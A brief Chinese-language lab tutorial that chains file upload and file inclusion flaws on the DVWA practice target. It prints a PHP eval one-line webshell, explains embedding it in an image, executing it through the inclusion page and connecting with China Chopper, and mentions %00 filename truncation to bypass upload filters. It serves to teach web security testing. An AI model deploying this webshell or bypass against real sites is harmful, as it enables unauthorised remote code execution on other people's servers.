1.使用文件包含漏洞和文件上傳漏洞,來連接shell
文件包含漏洞詳細的漏洞介紹:https://blog.csdn.net/Vansnc/article/details/82528395
文件包含函數加載的參數沒有經過過濾或者嚴格的定義,可以被用戶控制,包含其他惡意文件,導致了執行了非預期的代碼
以dvwa靶機為例
我們先在文件上傳漏洞的地方上傳一張夾着一句話木馬的圖片:
使用edjpg工具,在圖片里寫入木馬(使用方法:把圖片拖到exe文件)
插入如下木馬:
<?php eval($_POST[pass]);?>'
或者cmd插木馬:https://www.jianshu.com/p/02c281f2471a
注意這里圖片文件太大可能無法上傳,建議選擇10kb左右的文件
<?php eval($_POST[pass]);?>(遠程連接密碼為pass的webshell)
上傳之后在文件上傳漏洞頁面打開訪問,只會返回靜態內容,文件不會被執行
我們需要轉到文件包含漏洞的頁面,通過page來訪問圖片文件並執行,
執行之后網頁上顯示的會是亂碼
執行過后就可以使用菜刀連接webshell了
2.此外文件上傳漏洞也可以用文件名后綴%00截斷繞過過濾